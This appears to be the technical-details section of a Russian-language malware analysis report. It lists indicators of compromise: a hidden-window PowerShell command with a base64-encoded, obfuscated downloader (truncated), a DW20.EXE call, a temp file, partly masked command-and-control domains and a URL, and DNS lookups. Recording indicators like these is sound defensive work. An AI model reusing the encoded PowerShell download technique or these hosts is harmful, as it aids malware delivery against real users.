Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAEcAYwBBAEEANABHAFUAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAEgAVQBCAEEAJwAsACcAawBBACcAKQA7ACQASQBCADQAXwBBAFUAXwA9AG4AZQBXAC0ATwBiAGAASgBFAGAAYwBUACAAKAAnAE4AZQAnACsAJwB0AC4AJwArACcAVwBlAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1532
- %TEMP%\1212548.cvr
- 'ka###anthu.com':443
- 'yo###ihe.com':443
- '52###affe.com':443
- '24##nux.com':443
- 'bi###nomad.com':80
- http://bi###nomad.com/oldpages/8cXyL/
- 'ka###anthu.com':443
- 'yo###ihe.com':443
- '24##nux.com':443
- DNS ASK ka###anthu.com
- DNS ASK yo###ihe.com
- DNS ASK 52###affe.com
- DNS ASK 24##nux.com
- DNS ASK bi###nomad.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAEcAYwBBAEEANABHAFUAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAEgAVQBCAEEAJwAsACcAawBBACcAKQA7ACQASQBCADQAXwBBAFUAXwA9AG4AZQBXAC0ATwBiAGAASgBFAGAAYwBUACAAKAAnAE4AZQAnACsAJwB0AC4AJwArACcAVwBlAG...' (со скрытым окном)